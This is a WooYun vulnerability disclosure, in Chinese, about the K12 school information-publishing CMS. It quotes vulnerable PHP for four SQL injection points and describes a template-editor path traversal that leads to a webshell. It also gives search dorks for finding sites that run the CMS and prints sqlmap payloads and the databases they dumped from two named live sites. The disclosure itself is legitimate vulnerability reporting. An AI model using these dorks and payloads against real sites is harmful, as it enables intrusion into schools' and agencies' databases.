当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060202

漏洞标题:某通用型信息发布系统多处SQL且GetShell

相关厂商:cncert国家互联网应急中心

漏洞作者: xfkxfk

提交时间:2014-05-12 11:47

修复时间:2014-08-10 11:48

公开时间:2014-08-10 11:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-12: 细节已通知厂商并且等待厂商处理中
2014-05-15: 厂商已经确认,细节仅向厂商公开
2014-05-18: 细节向第三方安全合作伙伴开放
2014-07-09: 细节向核心白帽子及相关领域专家公开
2014-07-19: 细节向普通白帽子公开
2014-07-29: 细节向实习白帽子公开
2014-08-10: 细节向公众公开

简要描述:

某通用型信息发布系统多处存在漏洞,SQL,GetShell,目录遍历,逻辑错误,设计缺陷等漏洞。

详细说明:

此系统之前有人提交了两个漏洞,很无语的是同一个漏洞哦~~~
WooYun: 某不知名CMS通杀SQL漏洞
WooYun: 某不知名CMS通杀SQL漏洞之二
然后,亲自测试了下,除了上述问题,还发现存在很多问题啊~~
系统介绍:
K12网站信息发布系统,大量中小学校,政府部门以及教育信息网在使用
官方网址:http://www.k12.com.cn/
百度关键字:inurl:cms/app/info/doc/index.php——(url特征)
百度关键字:版权所有:K12中国中小学教育教学网——(后台登陆特征,后台登陆地址cms/app/admin)
第一处SQL注入:
注入点:cms/app/info/poll/vote.php?pPollId=******(sqli)
文件/cms/app/info/poll/vote.php

<?php
require_once str_replace('\\','/',dirname(__FILE__)).'/../../../include/cms/cms_system.inc.php';
$cms_info = &$cms->get_cms_info();
$cms->set_module('POLL');
$poll_id = $_REQUEST['pPollId'];
$act = $_REQUEST['pAct'];
$cms->echo_header();
$conn = &$cms->get_adodb_conn();
$rs = &$cms_info->get_poll_rs($conn, 'poll_id='.$poll_id);
$poll_title = $rs->fields[1];
$poll_voters = $rs->fields[2];
$poll_type = $rs->fields[3];
$smarty->assign_by_ref('act', $act);
$smarty->assign_by_ref('poll_title', $poll_title);
$smarty->assign_by_ref('poll_id', $poll_id);
$rs = &$cms_info->get_poll_item_rs($conn, 'item_pollid='.$poll_id, 'item_id');


$poll_id = $_REQUEST['pPollId'];
然后在获取投票信息内容时,poll_id直接进入get_poll_rs函数
get_poll_rs函数也没有过滤,导致SQL注入。
第二处SQL注入:
文件/cms/app/info/poll/do.php

<?php
require_once str_replace('\\','/',dirname(__FILE__)).'/../../../include/cms/cms_system.inc.php';
$cms->set_module('POLL');
$poll_id = $_REQUEST['pPollId'];
$item_ids = $_REQUEST['pPollItemIds'];
if (!is_array($item_ids) || count($item_ids) <= 0) {
$cms->echo_header(FALSE);
?>
<script language="JavaScript">
function alertErrMsg()
{
alert('必须选择调查选项?);
document.location.href = './vote.php?pPollId=<?php echo $poll_id; ?>';
} //end function
window.onload = alertErrMsg;
</script>
<?php
$cms->echo_footer(FALSE);
exit;
} //end if
$result_url = './vote.php?pPollId='.$poll_id.'&pAct=result';
$conn = &$cms->get_adodb_conn();
$cms_info = &$cms->get_cms_info();
if (TRUE == $cms->arguments['poll_cookie']) {
$cookie_poll = $_COOKIE['sCookiePoll'];
$poll_ids = split('::', $cookie_poll);
if (in_array($poll_id, $poll_ids)) { //已投过票
$cms->echo_header(FALSE);
?>
<script language="JavaScript">
function alertErrMsg()
{
alert('您已经对此调查投过票,不能投第二次?);
document.location.href = "<?php echo $result_url; ?>";
} //end function
window.onload = alertErrMsg;
</script>
<?php
$cms->echo_footer(FALSE);
exit;
} //end if
} //end if
$cms_info->update_poll_vote($conn, $poll_id, $item_ids);
if (TRUE == $cms->arguments['poll_cookie']) { //设置 COOKIE
$cookie_poll .= ($cookie_poll) ? '::'.$poll_id : $poll_id;
setcookie ('sCookiePoll', $cookie_poll);
} //end if
header("Location: $result_url");
?>


$poll_id = $_REQUEST['pPollId'];
$item_ids = $_REQUEST['pPollItemIds'];
然后poll_id 和item_ids 直接进入update_poll_vote函数
update_poll_vote也未进行过滤,导致SQL注入。
这里还存在设计缺陷
在投票时,只判断COOKIE的值,这里可以伪造COOKIE导致刷票漏洞。
第三处SQL注入:
文件/cms/app/info/check/index.php

<?php
require_once str_replace('\\','/',dirname(__FILE__)).'/../../../include/cms/cms_system.inc.php';
$conn = &$cms->get_adodb_conn('', 'Info');
//$conn->debug = TRUE;
$cms_info = &$cms->get_cms_info();
$cms->set_module('CHECK');
//此参数用于生成静态文件,直接运行朿PHP,不跳转到静态页靿
if ($_SERVER['PATH_INFO']) {
$params = explode('/', preg_replace('/\?.+$/', '', $_SERVER['PATH_INFO']));
$cat_body_id = $params[1];
$run = (isset($params[2]) && 'create_static' == $params[2]) ? TRUE : FALSE;
} else {
$cat_body_id = $_REQUEST['pCatBodyId'];
$run = ('create_static' == $_REQUEST['pRun']) ? TRUE : FALSE;
} //end if
if (!$cat_body_id)
$cms->trigger_error('参数 $pCatBodyId 不能为空?, E_USER_ERROR);
// 获取当前内容记录
//$rs = &$cms_info->get_cat_body_rs($conn, "cat_body_id=".$cat_body_id." AND cat_body_confirm=1", '', TRUE, FALSE);
$rs = &$cms_info->get_cat_body_rs($conn, "cat_body_id=".$cat_body_id, '', TRUE, FALSE);
if ($rs->RecordCount() <= 0)
$cms->trigger_error('没找到ID 号为 '.$cat_body_id.' 的内容,该内容不存在,或者已被删除?, E_USER_ERROR);
$cat_body_confirm = $rs->fields[11];
if ($cat_body_confirm == 0)
$cms->trigger_error('ID 号为 '.$cat_body_id.' 的内容未通过验证?, E_USER_ERROR);
$_REQUEST['pCatId'] = $cat_id = $rs->fields[1];
$cat_body_title = $rs->fields[2];
$cat_body_author = $rs->fields[3];
$cat_body_type = $rs->fields[4];
$cat_body_url = $rs->fields[5];
$cat_body_keyword = $rs->fields[6];
$cat_body_indate = $rs->fields[7];
$cat_body_outdate = $rs->fields[8];
$cat_body_click = $rs->fields[9];
$cat_body_content = ('I' == $cat_body_type)?'<img src="'.$cat_body_url.'" border="1" />':$rs->fields[13];


$cat_body_id = $_REQUEST['pCatBodyId'];
然后在获取当前内容时,cat_body_id 直接进入get_cat_body_rs函数
get_cat_body_rs也未进行过滤,导致SQL注入。
第四处SQL注入:
文件/cms/app/info/doc/ajax.php

<?php
require_once str_replace('\\','/',dirname(__FILE__)).'/../../../include/cms/cms_system.inc.php';
$conn = &$cms->get_adodb_conn('', 'Info');
//$conn->debug = TRUE;
$cms_info = &$cms->get_cms_info();
$cms->set_module('DOC');
$cat_body_id = $_POST['cat_body_id'];
$rs = &$cms_info->get_cat_body_rs($conn, "cat_body_id=".$cat_body_id, '', TRUE, FALSE);
echo $rs->fields[9];
//echo $cat_body_id;
?>


$cat_body_id = $_POST['cat_body_id'];
参数没有过滤直接进入get_cat_body_rs,导致SQL注入。
第五处GetShell,目录遍历漏洞:
进一步跑出后台登陆的账号,后台拿shell。
后台地址:http://www.xxx.cn/cms/app/admin
在后台配置模板处,可以编辑模板内容
http://www.xxx.com/cms/app/admin/complex/tpl_edit.php?pCurDir=xxx.tpl
这里存在目录遍历,导致可以修改任意文件,然后拿webshell

漏洞证明:

拿此系统的使用案例进行漏洞证明
案例一:
http://www.rzlsedu.cn/
SQLMAP跑出数据证明:
数据库信息:

GET parameter 'pPollId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:
---
Place: GET
Parameter: pPollId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pPollId=1 AND 6938=6938
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: pPollId=1 UNION ALL SELECT CONCAT(0x716e747571,0x4c4b7672435a744b4c65,0x716b707871),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: pPollId=1 AND SLEEP(5)
---
[17:39:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0.11
[17:39:31] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] K12JWT
[*] K12Platform
[*] mysql
[*] test


表信息:

Database: k12Platform
[11 tables]
+--------------------+
| k12_code |
| k12_group |
| k12_group_pri |
| k12_product |
| k12_product_log |
| k12_product_module |
| k12_product_type |
| k12_rpc_log |
| k12_session |
| k12_user |
| k12_user_pri |
+--------------------+


案例二:
http://www.hxjy.com/
SQLMAP跑出数据证明:
数据库信息:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pCatBodyId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pCatBodyId=1 AND 4961=4961
---
[17:08:56] [INFO] testing MySQL
[17:08:56] [INFO] confirming MySQL
[17:08:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[17:08:56] [INFO] fetching database names
[17:08:56] [INFO] fetching number of databases
[17:08:56] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:08:56] [INFO] retrieved:
[17:08:57] [WARNING] reflective value(s) found and filtering out
9
[17:08:59] [INFO] retrieved: information_schema
[17:09:50] [INFO] retrieved: K12JWT1
[17:10:06] [INFO] retrieved: K12Platform
[17:10:31] [INFO] retrieved: k12im
[17:10:42] [INFO] retrieved: k12msg
[17:10:54] [INFO] retrieved: k12notification
[17:11:24] [INFO] retrieved: k12uls
[17:11:39] [INFO] retrieved: mysql
[17:11:53] [INFO] retrieved: test
available databases [9]:
[*] information_schema
[*] k12im
[*] K12JWT1
[*] k12msg
[*] k12notification
[*] K12Platform
[*] k12uls
[*] mysql
[*] test


表信息:

Database: k12Platform
[13 tables]
+--------------------+
| extend_define |
| k12_code |
| k12_group |
| k12_group_pri |
| k12_product |
| k12_product_log |
| k12_product_module |
| k12_product_type |
| k12_rpc_log |
| k12_session |
| k12_tag_pri |
| k12_user |
| k12_user_pri |
+--------------------+

修复方案:

过滤参数,用intval处理各种Id参数

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-05-15 19:07

厂商回复:

CNVD确认并复现所述情况,转由CNVD通过公开联系渠道联系软件生产厂商处置。

最新状态:

暂无


漏洞评价:

评论